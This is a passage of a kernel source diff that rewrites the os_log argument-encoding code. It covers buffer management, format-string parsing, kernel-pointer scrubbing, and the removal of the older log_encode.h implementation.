+       assert(arg_len <= sizeof(value));
+       (void) memcpy(&value, arg, arg_len);
+
+#if __has_feature(ptrauth_calls)
+       /**
+        * Strip out the pointer authentication code before
+        * checking whether the pointer is a kernel address.
+        */
+       value = (unsigned long long)VM_KERNEL_STRIP_PTR(value);
+#endif /* __has_feature(ptrauth_calls) */
+
+       return value >= VM_MIN_KERNEL_AND_KEXT_ADDRESS && value <= VM_MAX_KERNEL_ADDRESS;
+}
+
+static void
+log_context_cursor_advance(os_log_context_t ctx, size_t amount)
+{
+       ctx->ctx_content_off += amount;
+       assert(log_context_cursor(ctx) <= (ctx->ctx_buffer + ctx->ctx_buffer_sz));
+}
+
+static bool
+log_fits(os_log_context_t ctx, size_t data_size)
+{
+       return (ctx->ctx_content_off + data_size) <= ctx->ctx_content_sz;
+}
+
+static bool
+log_fits_cmd(os_log_context_t ctx, size_t data_size)
+{
+       return log_fits(ctx, sizeof(*ctx->ctx_hdr) + data_size);
+}
+
+static void
+log_range_update(os_log_fmt_range_t range, uint16_t offset, uint16_t length)
+{
+       range->offset = offset;
+       /*
+        * Truncated flag may have already been set earlier, hence do not
+        * overwrite it blindly.
+        */
+       if (length < range->length) {
+               range->truncated = true;
+       }
+       range->length = length;
+}
+
+/*
+ * Stores a command in the main section. The value itself is wrapped in
+ * the os_log_fmt_cmd_t struct.
+ */
+static void
+log_add_cmd(os_log_context_t ctx, os_log_fmt_cmd_type_t type, uint8_t flags,
+    void *arg, size_t arg_size)
+{
+       os_log_fmt_cmd_t cmd;
+       const size_t cmd_sz = sizeof(*cmd) + arg_size;
+
+       assert(log_fits_cmd(ctx, cmd_sz));
+       assert(arg_size <= UINT8_MAX);
+
+       cmd = (os_log_fmt_cmd_t)log_context_cursor(ctx);
+       cmd->cmd_type = type;
+       cmd->cmd_flags = flags;
+       cmd->cmd_size = (uint8_t)arg_size;
+       (void) memcpy(cmd->cmd_data, arg, cmd->cmd_size);
+
+       assert(cmd_sz == sizeof(*cmd) + cmd->cmd_size);
+       log_context_cursor_advance(ctx, cmd_sz);
+}
+
+/*
+ * Collect details about argument which needs to be stored in the pubdata
+ * section.
+ */
+static void
+log_collect_public_range_data(os_log_context_t ctx, os_log_fmt_range_t range, void *arg)
+{
+       ctx->ctx_pubdata[ctx->ctx_pubdata_cnt++] = (char *)arg;
+       ctx->ctx_pubdata_sz += range->length;
+}
+
+static void
+log_add_range_data(os_log_context_t ctx, os_log_fmt_range_t range, void *arg)
+{
+       assert(log_fits(ctx, range->length));
+       (void) memcpy(log_context_cursor(ctx), arg, range->length);
+       log_context_cursor_advance(ctx, range->length);
+}
+
+static struct os_log_fmt_range_s
+log_create_range(os_log_context_t ctx, size_t arg_len)
+{
+       const size_t final_arg_len = MIN(arg_len, UINT16_MAX);
+
+       return (struct os_log_fmt_range_s) {
+                      .offset = ctx->ctx_pubdata_sz,
+                      .length = (uint16_t)final_arg_len,
+                      .truncated = (final_arg_len < arg_len)
+       };
+}
+
+static int
+log_add_range_arg(os_log_context_t ctx, os_log_fmt_cmd_type_t type, os_log_fmt_cmd_flags_t flags,
+    void *arg, size_t arg_len)
+{
+       struct os_log_fmt_range_s range;
+
+       if (!log_fits_cmd(ctx, sizeof(range))) {
+               return ENOMEM;
+       }
+
+       range = log_create_range(ctx, arg_len);
+
+       if (flags == OSLF_CMD_FLAG_PUBLIC) {
+               if (ctx->ctx_pubdata_cnt == OS_LOG_MAX_PUB_ARGS) {
+                       return ENOMEM;
+               }
+               assert(ctx->ctx_pubdata_cnt < OS_LOG_MAX_PUB_ARGS);
+               log_collect_public_range_data(ctx, &range, arg);
+       }
+       log_add_cmd(ctx, type, flags, &range, sizeof(range));
+       ctx->ctx_hdr->hdr_cmd_cnt++;
+
+       return 0;
+}
+
+/*
+ * Adds a scalar argument value to the main section.
+ */
+static int
+log_add_arg(os_log_context_t ctx, os_log_fmt_cmd_type_t type, void *arg, size_t arg_len)
+{
+       assert(type == OSLF_CMD_TYPE_COUNT || type == OSLF_CMD_TYPE_SCALAR);
+       assert(arg_len < UINT16_MAX);
+
+       if (log_fits_cmd(ctx, arg_len)) {
+               log_add_cmd(ctx, type, OSLF_CMD_FLAG_PUBLIC, arg, arg_len);
+               ctx->ctx_hdr->hdr_cmd_cnt++;
+               return 0;
+       }
+
+       return ENOMEM;
+}
+
+static void
+log_encode_public_data(os_log_context_t ctx)
+{
+       const uint16_t orig_content_off = ctx->ctx_content_off;
+       os_log_fmt_hdr_t const hdr = ctx->ctx_hdr;
+       os_log_fmt_cmd_t cmd = (os_log_fmt_cmd_t)hdr->hdr_data;
+
+       assert(ctx->ctx_pubdata_cnt <= hdr->hdr_cmd_cnt);
+
+       for (int i = 0, pub_i = 0; i < hdr->hdr_cmd_cnt; i++, cmd = (os_log_fmt_cmd_t)(cmd->cmd_data + cmd->cmd_size)) {
+               if (cmd->cmd_type != OSLF_CMD_TYPE_STRING) {
+                       continue;
+               }
+
+               os_log_fmt_range_t const range __attribute__((aligned(8))) = (os_log_fmt_range_t)&cmd->cmd_data;
+
+               // Fix offset and length of the argument data in the hdr.
+               log_range_update(range, ctx->ctx_content_off - orig_content_off,
+                   MIN(range->length, ctx->ctx_content_sz - ctx->ctx_content_off));
+
+               if (range->truncated) {
+                       ctx->ctx_truncated = true;
+               }
+
+               assert(pub_i < ctx->ctx_pubdata_cnt);
+               log_add_range_data(ctx, range, ctx->ctx_pubdata[pub_i++]);
+       }
+}
+
+static bool
+log_expand(os_log_context_t ctx, size_t new_size)
+{
+       assert(new_size > ctx->ctx_buffer_sz);
+
+       if (!oslog_is_safe()) {
+               return false;
+       }
+
+       size_t final_size = new_size;
+
+       void *buf = logmem_alloc(ctx->ctx_logmem, &final_size);
+       if (!buf) {
+               return false;
+       }
+       assert(final_size >= new_size);
+
+       // address length header + already stored data
+       const size_t hdr_size = (uint8_t *)ctx->ctx_hdr - ctx->ctx_buffer;
+       const size_t copy_size = hdr_size + sizeof(*ctx->ctx_hdr) + ctx->ctx_content_sz;
+       assert(copy_size <= new_size);
+       (void) memcpy(buf, ctx->ctx_buffer, copy_size);
+
+       if (ctx->ctx_allocated) {
+               logmem_free(ctx->ctx_logmem, ctx->ctx_buffer, ctx->ctx_buffer_sz);
+       }
+
+       ctx->ctx_buffer = buf;
+       ctx->ctx_buffer_sz = final_size;
+       ctx->ctx_content_sz = (uint16_t)(ctx->ctx_buffer_sz - hdr_size - sizeof(*ctx->ctx_hdr));
+       ctx->ctx_hdr = (os_log_fmt_hdr_t)&ctx->ctx_buffer[hdr_size];
+       ctx->ctx_allocated = true;
+
+       return true;
+}
+
+static int
+log_encode_fmt_arg(void *arg, size_t arg_len, os_log_fmt_cmd_type_t type, os_log_context_t ctx)
+{
+       int rc = 0;
+
+       switch (type) {
+       case OSLF_CMD_TYPE_COUNT:
+       case OSLF_CMD_TYPE_SCALAR:
+               // Scrub kernel pointers.
+               if (doprnt_hide_pointers && is_kernel_pointer(arg, arg_len)) {
+                       rc = log_add_range_arg(ctx, type, OSLF_CMD_FLAG_PRIVATE, NULL, 0);
+                       ctx->ctx_hdr->hdr_flags |= OSLF_HDR_FLAG_HAS_PRIVATE;
+               } else {
+                       rc = log_add_arg(ctx, type, arg, arg_len);
+               }
+               break;
+       case OSLF_CMD_TYPE_STRING:
+               rc = log_add_range_arg(ctx, type, OSLF_CMD_FLAG_PUBLIC, arg, arg_len);
+               ctx->ctx_hdr->hdr_flags |= OSLF_HDR_FLAG_HAS_NON_SCALAR;
+               break;
+       default:
+               panic("Unsupported log value type");
+       }
+
+       return rc;
+}
+
+static int
+log_encode_fmt(os_log_context_t ctx, const char *format, va_list args)
+{
+       const char *percent = strchr(format, '%');
+
+       while (percent != NULL) {
+               ++percent;
+
+               if (percent[0] == '%') {
+                       percent = strchr(percent + 1, '%'); // Find next format after %%
+                       continue;
+               }
+
+               struct os_log_format_value_s value;
+               int     type = OST_INT;
+               int     prec = 0;
+               char    ch;
+
+               for (bool done = false; !done; percent++) {
+                       int err = 0;
+
+                       switch (ch = percent[0]) {
+                       /* type of types or other */
+                       case 'l': // longer
+                               type++;
+                               break;
+
+                       case 'h': // shorter
+                               type--;
+                               break;
+
+                       case 'z':
+                               type = OST_SIZE;
+                               break;
+
+                       case 'j':
+                               type = OST_INTMAX;
+                               break;
+
+                       case 't':
+                               type = OST_PTRDIFF;
+                               break;
+
+                       case 'q':
+                               type = OST_LONGLONG;
+                               break;
+
+                       case '.': // precision
+                               if ((percent[1]) == '*') {
+                                       prec = va_arg(args, int);
+                                       err = log_encode_fmt_arg(&prec, sizeof(prec), OSLF_CMD_TYPE_COUNT, ctx);
+                                       if (slowpath(err)) {
+                                               return err;
+                                       }
+                                       percent++;
+                                       continue;
+                               } else {
+                                       // we have to read the precision and do the right thing
+                                       const char *fmt = percent + 1;
+                                       prec = 0;
+                                       while (isdigit(ch = *fmt++)) {
+                                               prec = 10 * prec + (ch - '0');
+                                       }
+
+                                       if (prec > 1024) {
+                                               prec = 1024;
+                                       }
+
+                                       err = log_encode_fmt_arg(&prec, sizeof(prec), OSLF_CMD_TYPE_COUNT, ctx);
+                               }
+                               break;
+
+                       case '-': // left-align
+                       case '+': // force sign
+                       case ' ': // prefix non-negative with space
+                       case '#': // alternate
+                       case '\'': // group by thousands
+                               break;
+
+                       /* fixed types */
+                       case 'd': // integer
+                       case 'i': // integer
+                       case 'o': // octal
+                       case 'u': // unsigned
+                       case 'x': // hex
+                       case 'X': // upper-hex
+                               switch (type) {
+                               case OST_CHAR:
+                                       value.type.ch = (char) va_arg(args, int);
+                                       err = log_encode_fmt_arg(&value.type.ch, sizeof(value.type.ch), OSLF_CMD_TYPE_SCALAR, ctx);
+                                       break;
+
+                               case OST_SHORT:
+                                       value.type.s = (short) va_arg(args, int);
+                                       err = log_encode_fmt_arg(&value.type.s, sizeof(value.type.s), OSLF_CMD_TYPE_SCALAR, ctx);
+                                       break;
+
+                               case OST_INT:
+                                       value.type.i = va_arg(args, int);
+                                       err = log_encode_fmt_arg(&value.type.i, sizeof(value.type.i), OSLF_CMD_TYPE_SCALAR, ctx);
+                                       break;
+
+                               case OST_LONG:
+                                       value.type.l = va_arg(args, long);
+                                       err = log_encode_fmt_arg(&value.type.l, sizeof(value.type.l), OSLF_CMD_TYPE_SCALAR, ctx);
+                                       break;
+
+                               case OST_LONGLONG:
+                                       value.type.ll = va_arg(args, long long);
+                                       err = log_encode_fmt_arg(&value.type.ll, sizeof(value.type.ll), OSLF_CMD_TYPE_SCALAR, ctx);
+                                       break;
+
+                               case OST_SIZE:
+                                       value.type.z = va_arg(args, size_t);
+                                       err = log_encode_fmt_arg(&value.type.z, sizeof(value.type.z), OSLF_CMD_TYPE_SCALAR, ctx);
+                                       break;
+
+                               case OST_INTMAX:
+                                       value.type.im = va_arg(args, intmax_t);
+                                       err = log_encode_fmt_arg(&value.type.im, sizeof(value.type.im), OSLF_CMD_TYPE_SCALAR, ctx);
+                                       break;
+
+                               case OST_PTRDIFF:
+                                       value.type.pd = va_arg(args, ptrdiff_t);
+                                       err = log_encode_fmt_arg(&value.type.pd, sizeof(value.type.pd), OSLF_CMD_TYPE_SCALAR, ctx);
+                                       break;
+
+                               default:
+                                       return EINVAL;
+                               }
+                               done = true;
+                               break;
+
+                       case 'p': // pointer
+                               value.type.p = va_arg(args, void *);
+                               err = log_encode_fmt_arg(&value.type.p, sizeof(value.type.p), OSLF_CMD_TYPE_SCALAR, ctx);
+                               done = true;
+                               break;
+
+                       case 'c': // char
+                               value.type.ch = (char) va_arg(args, int);
+                               err = log_encode_fmt_arg(&value.type.ch, sizeof(value.type.ch), OSLF_CMD_TYPE_SCALAR, ctx);
+                               done = true;
+                               break;
+
+                       case 's': // string
+                               value.type.pch = va_arg(args, char *);
+                               if (prec == 0 && value.type.pch) {
+                                       prec = (int) strlen(value.type.pch) + 1;
+                               }
+                               err = log_encode_fmt_arg(value.type.pch, prec, OSLF_CMD_TYPE_STRING, ctx);
+                               prec = 0;
+                               done = true;
+                               break;
+
+                       case 'm':
+                               value.type.i = 0; // Does %m make sense in the kernel?
+                               err = log_encode_fmt_arg(&value.type.i, sizeof(value.type.i), OSLF_CMD_TYPE_SCALAR, ctx);
+                               done = true;
+                               break;
+
+                       default:
+                               if (isdigit(ch)) { // [0-9]
+                                       continue;
+                               }
+                               return EINVAL;
+                       }
+
+                       if (slowpath(err)) {
+                               return err;
+                       }
+
+                       if (done) {
+                               percent = strchr(percent, '%'); // Find next format
+                               break;
+                       }
+               }
+       }
+
+       return 0;
+}
+
+static inline size_t
+write_address_location(uint8_t buf[static sizeof(uint64_t)],
+    void *dso, const void *address, firehose_tracepoint_flags_t *flags, bool driverKit)
+{
+       uintptr_t shift_addr = (uintptr_t)address - (uintptr_t)dso;
+
+       kc_format_t kcformat = KCFormatUnknown;
+       __assert_only bool result = PE_get_primary_kc_format(&kcformat);
+       assert(result);
+
+       if (kcformat == KCFormatStatic || kcformat == KCFormatKCGEN) {
+               *flags = _firehose_tracepoint_flags_pc_style_shared_cache;
+               memcpy(buf, (uint32_t[]){ (uint32_t)shift_addr }, sizeof(uint32_t));
+               return sizeof(uint32_t);
+       }
+
+       /*
+        * driverKit will have the dso set as MH_EXECUTE (it is logging from a
+        * syscall in the kernel) but needs logd to parse the address as an
+        * absolute pc.
+        */
+       kernel_mach_header_t *mh = dso;
+       if (mh->filetype == MH_EXECUTE && !driverKit) {
+               *flags = _firehose_tracepoint_flags_pc_style_main_exe;
+               memcpy(buf, (uint32_t[]){ (uint32_t)shift_addr }, sizeof(uint32_t));
+               return sizeof(uint32_t);
+       }
+
+       *flags = _firehose_tracepoint_flags_pc_style_absolute;
+       shift_addr = driverKit ? (uintptr_t)address : VM_KERNEL_UNSLIDE(address);
+       size_t len = sizeof(uintptr_t);
+
+#if __LP64__
+       len = 6; // 48 bits are enough
+#endif
+       memcpy(buf, (uintptr_t[]){ shift_addr }, len);
+
+       return len;
+}
+
+static void
+os_log_encode_location(os_log_context_t ctx, void *addr, void *dso, bool driverKit,
+    firehose_tracepoint_flags_t *ft_flags)
+{
+       const size_t hdr_size = write_address_location(ctx->ctx_buffer, dso, addr, ft_flags, driverKit);
+       ctx->ctx_hdr = (os_log_fmt_hdr_t)&ctx->ctx_buffer[hdr_size];
+       ctx->ctx_content_sz = (uint16_t)(ctx->ctx_buffer_sz - hdr_size - sizeof(*ctx->ctx_hdr));
+}
+
+/*
+ * Encodes argument (meta)data into a format consumed by libtrace. Stores
+ * metadada for all arguments first. Metadata also include scalar argument
+ * values. Second step saves data which are encoded separately from respective
+ * metadata (like strings).
+ */
+bool
+os_log_context_encode(os_log_context_t ctx, const char *fmt, va_list args, void *addr, void *dso, bool driverKit)
+{
+       os_log_encode_location(ctx, addr, dso, driverKit, &ctx->ctx_ft_flags);
+
+       va_list args_copy;
+       va_copy(args_copy, args);
+
+       int rc = log_encode_fmt(ctx, fmt, args);
+
+       va_end(args_copy);
+
+       switch (rc) {
+       case EINVAL:
+               // Bogus/Unsupported fmt string
+               counter_inc(&oslog_p_fmt_invalid_msgcount);
+               return false;
+       case ENOMEM:
+               /*
+                * The fmt contains unreasonable number of arguments (> 32) and
+                * we ran out of space. We could call log_expand()
+                * here and retry. However, using such formatting strings rather
+                * seem like a misuse of the logging system, hence error.
+                */
+               counter_inc(&oslog_p_fmt_max_args_msgcount);
+               return false;
+       case 0:
+               break;
+       default:
+               panic("unhandled return value");
+       }
+
+       if (ctx->ctx_pubdata_sz == 0) {
+               goto finish;
+       }
+
+       if (!log_fits(ctx, ctx->ctx_pubdata_sz)) {
+               size_t space_needed = log_context_cursor(ctx) + ctx->ctx_pubdata_sz - ctx->ctx_buffer;
+               space_needed = MIN(space_needed, logmem_max_size(ctx->ctx_logmem));
+               (void) log_expand(ctx, space_needed);
+       }
+
+       log_encode_public_data(ctx);
+
+       if (ctx->ctx_truncated) {
+               counter_inc(&oslog_p_truncated_msgcount);
+       }
+finish:
+       ctx->ctx_content_sz = (uint16_t)(log_context_cursor(ctx) - ctx->ctx_buffer);
+       ctx->ctx_content_off = 0;
+       return true;
+}
+
+void
+os_log_context_init(os_log_context_t ctx, logmem_t *logmem, uint8_t *buffer, size_t buffer_sz)
+{
+       assert(logmem);
+       assert(buffer);
+       assert(buffer_sz > 0);
+
+       bzero(ctx, sizeof(*ctx));
+       ctx->ctx_logmem = logmem;
+       ctx->ctx_buffer = buffer;
+       ctx->ctx_buffer_sz = buffer_sz;
+}
+
+void
+os_log_context_free(os_log_context_t ctx)
+{
+       if (ctx->ctx_allocated) {
+               logmem_free(ctx->ctx_logmem, ctx->ctx_buffer, ctx->ctx_buffer_sz);
+       }
+}
index 82f2ac21d12e59331c511c8a5e5b66b260e9fb7f..40be98626d92477a5eb41d83c7e7619f2ea332f9 100644 (file)
@@ -1,5 +1,5 @@
 /*
- * Copyright (c) 2015-2016 Apple Inc. All rights reserved.
+ * Copyright (c) 2015-2020 Apple Inc. All rights reserved.
  *
  * @APPLE_LICENSE_HEADER_START@
  *
 #define log_encode_h
 
 #include "log_encode_types.h"
-#include <sys/param.h>
 
-#if __has_feature(ptrauth_calls)
-#include <mach/vm_param.h>
-#include <ptrauth.h>
-#endif /* __has_feature(ptrauth_calls) */
-
-#ifdef KERNEL
-#define isdigit(ch) (((ch) >= '0') && ((ch) <= '9'))
-extern boolean_t doprnt_hide_pointers;
-#endif
-
-static bool
-_encode_data(os_log_buffer_value_t content, const void *arg, size_t arg_len, os_log_buffer_context_t context)
-{
-       struct os_log_arginfo_s arginfo;
-       void *databuf;
-
-       arg_len = MIN(arg_len, UINT16_MAX);
-
-       if (content->flags & OS_LOG_CONTENT_FLAG_PRIVATE) {
-               databuf = context->privdata + context->privdata_off;
-               arginfo.length = MIN((uint16_t)arg_len, (context->privdata_sz - context->privdata_off));
-               arginfo.offset = context->privdata_off;
-       } else {
-               databuf = context->pubdata + context->pubdata_off;
-               arginfo.length = MIN((uint16_t)arg_len, (context->pubdata_sz - context->pubdata_off));
-               arginfo.offset = context->pubdata_off;
-       }
-
-       if (context->arg_content_sz > 0) {
-               arginfo.length = MIN((uint16_t)context->arg_content_sz, arginfo.length);
-       }
-
-       memcpy(content->value, &arginfo, sizeof(arginfo));
-       content->size = sizeof(arginfo);
-
-       if (arginfo.length) {
-               if (content->type == OS_LOG_BUFFER_VALUE_TYPE_STRING
-#ifndef KERNEL
-                   || content->type == OS_LOG_BUFFER_VALUE_TYPE_OBJECT
-#endif
-                   ) {
-                       strlcpy(databuf, arg, arginfo.length);
-               } else {
-                       memcpy(databuf, arg, arginfo.length);
-               }
-       }
-
-       if (content->flags & OS_LOG_CONTENT_FLAG_PRIVATE) {
-               context->privdata_off += arginfo.length;
-       } else {
-               context->pubdata_off += arginfo.length;
-       }
-
-       context->content_off += sizeof(*content) + content->size;
-       context->arg_content_sz = 0;
-
-       return true;
-}
-
-#ifndef KERNEL
-static void
-_os_log_parse_annotated(char *annotated, const char **visibility, const char **library, const char **type)
-{
-       char *values[3] = { NULL };
-       int cnt = 0;
-       int idx = 0;
-
-       for (; cnt < 3;) {
-               char *token = strsep(&annotated, ", {}");
-               if (token == NULL) {
-                       break;
-               }
-
-               if (*token == '\0') {
-                       continue;
-               }
-
-               values[cnt++] = token;
-       }
-
-       if ((cnt > 0) && (!strcmp(values[0], "public") || !strcmp(values[0], "private"))) {
-               if (visibility != NULL) {
-                       (*visibility) = values[0];
-               }
-
-               idx++;
-       }
-
-       if (idx < cnt && (library != NULL) && (type != NULL)) {
-               char *decoder = values[idx];
-
-               for (cnt = 0; cnt < 3;) {
-                       char *token = strsep(&decoder, ": {}");
-                       if (token == NULL) {
-                               break;
-                       }
-
-                       if (*token == '\0') {
-                               continue;
-                       }
-
-                       values[cnt++] = token;
-               }
-
-               if (cnt == 2) {
-                       (*library) = values[0];
-                       (*type) = values[1];
-               }
-
-               if (cnt == 1) {
-                       (*library) = "builtin";
-                       (*type) = values[0];
-               }
-       }
-}
-#endif /* !KERNEL */
-
-OS_ALWAYS_INLINE
-static inline bool
-_os_log_encode_arg(void *arg, size_t arg_len, os_log_value_type_t ctype, bool is_private, os_log_buffer_context_t context)
-{
-       os_log_buffer_value_t content = (os_log_buffer_value_t) &context->buffer->content[context->content_off];
-       size_t content_sz = sizeof(*content) + arg_len;
-       char tempString[OS_LOG_BUFFER_MAX_SIZE] = {};
-#ifndef KERNEL
-       bool obj_private = true;
-#endif
-
-#ifdef KERNEL
-       /* scrub kernel pointers */
-       if (doprnt_hide_pointers &&
-           ctype == OS_LOG_BUFFER_VALUE_TYPE_SCALAR &&
-           arg_len >= sizeof(void *)) {
-               unsigned long long value = 0;
-               memcpy(&value, arg, arg_len);
-
-#if __has_feature(ptrauth_calls)
-               /**
-                * Strip out the pointer authentication code before
-                * checking whether the pointer is a kernel address.
-                */
-               value = (unsigned long long)VM_KERNEL_STRIP_PTR(value);
-#endif /* __has_feature(ptrauth_calls) */
-
-               if (value >= VM_MIN_KERNEL_AND_KEXT_ADDRESS && value <= VM_MAX_KERNEL_ADDRESS) {
-                       is_private = true;
-                       bzero(arg, arg_len);
-               }
-       }
-#endif
-
-       content->type = ctype;
-       content->flags = (is_private ? OS_LOG_CONTENT_FLAG_PRIVATE : 0);
-
-#ifndef KERNEL
-       if (context->annotated != NULL) {
-               const char *visibility = NULL;
-
-               _os_log_parse_annotated(context->annotated, &visibility, NULL, NULL);
-               if (visibility) {
-                       if (!strcasecmp(visibility, "private")) {
-                               content->flags |= OS_LOG_CONTENT_FLAG_PRIVATE;
-                       } else if (!strcasecmp(visibility, "public")) {
-                               content->flags &= ~OS_LOG_CONTENT_FLAG_PRIVATE;
-                       }
-               }
-
-               context->annotated = NULL;
-       }
-#endif /* !KERNEL */
-
-       switch (ctype) {
-       case OS_LOG_BUFFER_VALUE_TYPE_COUNT:
-       case OS_LOG_BUFFER_VALUE_TYPE_SCALAR:
-               if (is_private) {
-                       _encode_data(content, tempString, strlen(tempString) + 1, context);
-               } else {
-                       if ((context->content_off + content_sz) > context->content_sz) {
-                               return false;
-                       }
-
-                       memcpy(content->value, arg, arg_len);
-                       content->size = (uint8_t)arg_len;
-                       context->content_off += content_sz;
-               }
-               break;
-
-       case OS_LOG_BUFFER_VALUE_TYPE_STRING:
-               context->buffer->flags |= OS_LOG_BUFFER_HAS_NON_SCALAR;
-               if (_os_log_string_is_public(arg)) {
-                       content->flags &= ~OS_LOG_CONTENT_FLAG_PRIVATE;
-               }
-
-               _encode_data(content, arg, arg_len, context);
-               break;
-
-#ifndef KERNEL
-       case OS_LOG_BUFFER_VALUE_TYPE_POINTER:
-               context->buffer->flags |= OS_LOG_BUFFER_HAS_NON_SCALAR;
-               _encode_data(content, arg, arg_len, context);
-               break;
-
-       case OS_LOG_BUFFER_VALUE_TYPE_OBJECT:
-               context->buffer->flags |= OS_LOG_BUFFER_HAS_NON_SCALAR;
-               if (!_NSCF2data(arg, tempString, sizeof(tempString), &obj_private)) {
-                       tempString[0] = '\0';
-               }
-
-               if (!obj_private) {
-                       content->flags &= ~OS_LOG_CONTENT_FLAG_PRIVATE;
-               }
-
-               _encode_data(content, tempString, strlen(tempString) + 1, context);
-               break;
-#endif /* !KERNEL */
-       }
-
-       if (content->flags & OS_LOG_CONTENT_FLAG_PRIVATE) {
-               context->buffer->flags |= OS_LOG_BUFFER_HAS_PRIVATE;
-       }
-
-       context->arg_idx++;
-
-       return true;
-}
-
-static bool
-_os_log_encode(const char *format, va_list args, int saved_errno, os_log_buffer_context_t context)
-{
-       const char *percent = strchr(format, '%');
-#ifndef KERNEL
-       char annotated[256];
-#endif
-
-       while (percent != NULL) {
-               ++percent;
-               if (percent[0] != '%') {
-                       struct os_log_format_value_s value;
-                       int     type = OST_INT;
-#ifndef KERNEL
-                       bool    long_double = false;
-#endif
-                       int     prec = 0;
-                       char    ch;
-
-                       for (bool done = false; !done; percent++) {
-                               switch (ch = percent[0]) {
-                               /* type of types or other */
-                               case 'l': // longer
-                                       type++;
-                                       break;
-
-                               case 'h': // shorter
-                                       type--;
-                                       break;
-
-                               case 'z':
-                                       type = OST_SIZE;
-                                       break;
-
-                               case 'j':
-                                       type = OST_INTMAX;
-                                       break;
-
-                               case 't':
-                                       type = OST_PTRDIFF;
-                                       break;
-
-                               case '.': // precision
-                                       if ((percent[1]) == '*') {
-                                               prec = va_arg(args, int);
-                                               _os_log_encode_arg(&prec, sizeof(prec), OS_LOG_BUFFER_VALUE_TYPE_COUNT, false, context);
-                                               percent++;
-                                               continue;
-                                       } else {
-                                               // we have to read the precision and do the right thing
-                                               const char *fmt = percent + 1;
-                                               prec = 0;
-                                               while (isdigit(ch = *fmt++)) {
-                                                       prec = 10 * prec + (ch - '0');
-                                               }
-
-                                               if (prec > 1024) {
-                                                       prec = 1024;
-                                               }
-
-                                               _os_log_encode_arg(&prec, sizeof(prec), OS_LOG_BUFFER_VALUE_TYPE_COUNT, false, context);
-                                       }
-                                       break;
-
-                               case '-': // left-align
-                               case '+': // force sign
-                               case ' ': // prefix non-negative with space
-                               case '#': // alternate
-                               case '\'': // group by thousands
-                                       break;
-
-                               /* fixed types */
-                               case 'd': // integer
-                               case 'i': // integer
-                               case 'o': // octal
-                               case 'u': // unsigned
-                               case 'x': // hex
-                               case 'X': // upper-hex
-                                       switch (type) {
-                                       case OST_CHAR:
-                                               value.type.ch = (char) va_arg(args, int);
-                                               _os_log_encode_arg(&value.type.ch, sizeof(value.type.ch), OS_LOG_BUFFER_VALUE_TYPE_SCALAR, false, context);
-                                               break;
-
-                                       case OST_SHORT:
-                                               value.type.s = (short) va_arg(args, int);
-                                               _os_log_encode_arg(&value.type.s, sizeof(value.type.s), OS_LOG_BUFFER_VALUE_TYPE_SCALAR, false, context);
-                                               break;
-
-                                       case OST_INT:
-                                               value.type.i = va_arg(args, int);
-                                               _os_log_encode_arg(&value.type.i, sizeof(value.type.i), OS_LOG_BUFFER_VALUE_TYPE_SCALAR, false, context);
-                                               break;
-
-                                       case OST_LONG:
-                                               value.type.l = va_arg(args, long);
-                                               _os_log_encode_arg(&value.type.l, sizeof(value.type.l), OS_LOG_BUFFER_VALUE_TYPE_SCALAR, false, context);
-                                               break;
-
-                                       case OST_LONGLONG:
-                                               value.type.ll = va_arg(args, long long);
-                                               _os_log_encode_arg(&value.type.ll, sizeof(value.type.ll), OS_LOG_BUFFER_VALUE_TYPE_SCALAR, false, context);
-                                               break;
-
-                                       case OST_SIZE:
-                                               value.type.z = va_arg(args, size_t);
-                                               _os_log_encode_arg(&value.type.z, sizeof(value.type.z), OS_LOG_BUFFER_VALUE_TYPE_SCALAR, false, context);
-                                               break;
-
-                                       case OST_INTMAX:
-                                               value.type.im = va_arg(args, intmax_t);
-                                               _os_log_encode_arg(&value.type.im, sizeof(value.type.im), OS_LOG_BUFFER_VALUE_TYPE_SCALAR, false, context);
-                                               break;
-
-                                       case OST_PTRDIFF:
-                                               value.type.pd = va_arg(args, ptrdiff_t);
-                                               _os_log_encode_arg(&value.type.pd, sizeof(value.type.pd), OS_LOG_BUFFER_VALUE_TYPE_SCALAR, false, context);
-                                               break;
-
-                                       default:
-                                               return false;
-                                       }
-                                       done = true;
-                                       break;
-
-#ifndef KERNEL
-                               case '{':
-                                       // we do not support this for shimmed code
-                                       if (context->shimmed) {
-                                               return false;
-                                       }
-
-                                       for (const char *curr2 = percent + 1; (ch = (*curr2)) != NUL; curr2++) {
-                                               if (ch == '}') {
-                                                       strlcpy(annotated, percent, MIN(curr2 - (percent + 1), sizeof(annotated)));
-                                                       context->annotated = annotated;
-                                                       percent = curr2;
-                                                       break;
-                                               }
-                                       }
-                                       break;
-#endif /* !KERNEL */
-
-                               case 'p': // pointer
-                                       value.type.p = va_arg(args, void *);
-                                       _os_log_encode_arg(&value.type.p, sizeof(value.type.p), OS_LOG_BUFFER_VALUE_TYPE_SCALAR, false, context);
-                                       done = true;
-                                       break;
-
-#ifndef KERNEL
-                               case 'P': // pointer data
-                                       if (context->shimmed) { // we do not support this for shimmed code
-                                               return false;
-                                       }
-
-                                       context->buffer->flags |= OS_LOG_BUFFER_HAS_NON_SCALAR;
-                                       value.type.p = va_arg(args, void *);
-
-                                       // capture the string pointer to generate a symptom
-                                       if (context->log && context->log->generate_symptoms && context->arg_idx == 1 && value.type.pch && prec) {
-                                               context->symptom_ptr = value.type.p;
-                                               context->symptom_ptr_len = prec;
-                                       }
-
-                                       _os_log_encode_arg(value.type.p, prec, OS_LOG_BUFFER_VALUE_TYPE_POINTER, false, context);
-                                       prec = 0;
-                                       done = true;
-                                       break;
-#endif /* !KERNEL */
-
-#ifndef KERNEL
-                               case 'L': // long double
-                                       long_double = true;
-                                       break;
-
-                               case 'a': case 'A': case 'e': case 'E': // floating types
-                               case 'f': case 'F': case 'g': case 'G':
-                                       if (long_double) {
-                                               value.type.ld = va_arg(args, long double);
-                                               _os_log_encode_arg(&value.type.ld, sizeof(value.type.ld), OS_LOG_BUFFER_VALUE_TYPE_SCALAR, false, context);
-                                       } else {
-                                               value.type.d = va_arg(args, double);
-                                               _os_log_encode_arg(&value.type.d, sizeof(value.type.d), OS_LOG_BUFFER_VALUE_TYPE_SCALAR, false, context);
-                                       }
-                                       done = true;
-                                       break;
-#endif /* !KERNEL */
-
-                               case 'c': // char
-                                       value.type.ch = (char) va_arg(args, int);
-                                       _os_log_encode_arg(&value.type.ch, sizeof(value.type.ch), OS_LOG_BUFFER_VALUE_TYPE_SCALAR, false, context);
-                                       done = true;
-                                       break;
-
-#ifndef KERNEL
-                               case 'C': // wide-char
-                                       value.type.wch = va_arg(args, wint_t);
-                                       _os_log_encode_arg(&value.type.wch, sizeof(value.type.wch), OS_LOG_BUFFER_VALUE_TYPE_SCALAR, false, context);
